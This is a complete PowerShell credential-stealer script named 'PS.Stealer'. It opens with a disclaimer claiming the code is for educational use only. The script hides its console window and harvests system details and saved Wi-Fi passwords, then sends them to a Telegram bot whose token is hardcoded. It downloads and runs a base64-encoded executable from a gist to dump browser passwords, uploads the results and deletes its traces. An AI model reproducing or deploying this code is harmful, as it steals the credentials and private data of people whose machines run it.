# === Copyright (C) 20XX "PS.Stealer" by zetod1ce [github.com/ztd38f] === #

<#
[!] ДИСКЛЕЙМЕР [!]
Автор полностью отказывается от какой-либо ответственности за использование данного скрипта. Скрипт предоставляется "КАК ЕСТЬ", может быть изменён или дополнен в любое время без уведомления. Использование допускается только для личного обучения в строго контролируемой среде под надзором профессионалов. Всё использование осуществляется исключительно на ваш страх и риск.

[!] DISCLAIMER [!]
The author fully disclaims any responsibility for the use of this script. The script is provided "AS IS" and may be changed or updated at any time without notice. Use is permitted only for personal educational purposes in a strictly controlled environment under professional supervision. All use is entirely at your own risk.
#>

# -- Hide Console -- #
function WinHide ($flag = $false) {
    $v = if ($flag) {0} else {1}
    Add-Type 'using System;using System.Runtime.InteropServices;public class H{[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);}'
    [H]::ShowWindow([H]::GetConsoleWindow(),$v)>$null
}; WinHide

# -- Update Environment Variables For Current User -- #
function Update-UserVars {
    $ConsoleUser = ([Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[-1])
    $CurentUser = (((query session | sls console) -split '\s+')[1])
    $ConsoleUserPathName = ((gp "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\$((New-Object Security.Principal.NTAccount($ConsoleUser)).Translate([Security.Principal.SecurityIdentifier]).Value)").ProfileImagePath).Split('\',2)[1]
    $CurentUserPathName = ((gp "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\$((New-Object Security.Principal.NTAccount($CurentUser)).Translate([Security.Principal.SecurityIdentifier]).Value)").ProfileImagePath).Split('\',2)[1]
    $ConsoleUser, $CurentUser, $ConsoleUserPathName, $CurentUserPathName
    gci env: |% {si "env:\$($_.Name)" ($_.Value -replace [regex]::Escape($ConsoleUserPathName), $CurentUserPathName -replace [regex]::Escape($ConsoleUser), $CurentUser)}
}; Update-UserVars

    # --- Preparation For Working With The Telegram API --- #

$token = "7869005643:AAHpUqFBu9kvEzlpPJOTFq2UIXoluHbCQK8"
$chat_id = "-1002411530510"
$url = "https://api.telegram.org/bot$token"

function Post-Message ([string]$msg){irm -useb "$url/sendMessage" -Method POST -Body @{chat_id = $chat_id; text = $msg} >$null}
function Post-File ([string]$file){curl.exe -F chat_id="$chat_id" -F document=@"$file" "$url/sendDocument" >$null}

    # --- System Information Gathering & Sending --- #

$user = whoami
$ip = irm -useb ipinfo.io/ip
$model = (Get-CimInstance CIM_ComputerSystem).Model
$email = (Get-ComputerInfo).WindowsRegisteredOwner
$winver = (Get-WmiObject win32_operatingsystem).Caption+" "+(Get-WmiObject win32_operatingsystem).Version
$lng = (Get-WinSystemLocale).Name
$proc = (Get-WmiObject Win32_Processor).Name.trim()
$gpu = (Get-WmiObject Win32_VideoController).Name
$ram = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum |% {"{0:N1} GB" -f ($_.sum/1GB)}
$disk = (Get-PhysicalDisk).FriendlyName
$diskpart = (Get-WmiObject Win32_LogicalDisk |% {"$($_.FileSystem)/$($_.DeviceID) ($($_.VolumeName)) {0:N1}/{1:N1} [{2:N1}%]`n" -f (($_.Size-$_.FreeSpace)/1GB), ($_.Size/1GB), ((100*($_.Size-$_.FreeSpace))/$_.Size)}).trim()
$wifi = netsh wlan show profiles |? {$_ -match ':\s'} |% {$p=$_.Split(':')[1].Trim();if ($p){"$p [$((netsh wlan show profile name="$p" key=clear |? {$_ -like '*content*'} |% {$_.Split(':')[1].Trim()}))]"}}

$info = @"
$user [$ip] [$model] $email
$winver | $lng
$proc | $gpu | $ram
$disk
`n$($diskpart -join "`n")
`n$($wifi -join "`n")
"@

Post-Message $info

    # --- Browser Passwords Gathering & Sending --- #

# -- Base64 Encoder / Decoder Function -- #
function b64($i,$f){if ($f){[IO.File]::WriteAllBytes($f,[Convert]::FromBase64String($i))}else{[Convert]::ToBase64String([IO.File]::ReadAllBytes($i))}}

b64 (irm -useb gist.github.com/ZTD38F/037aca23256dbf558de5cc16feaa42be/raw) "$env:temp\wbpv.exe"

schtasks /create /tn WebPwd /tr "$env:systemroot\System32\conhost.exe --headless '$env:systemroot\System32\cmd.exe' /c start '' '$env:temp\wbpv.exe' /stext '$env:temp\WebPwd.txt'" /sc once /st 00:00 /ru $env:username /f
schtasks /run /tn WebPwd; schtasks /delete /tn WebPwd /f >$null 2>&1

while (!(Test-Path "$env:temp\WebPwd.txt")) {sleep 1} 
Post-File "$env:temp\WebPwd.txt"
rd "$env:temp\wbpv.exe","$env:temp\WebPwd.txt" -force
exit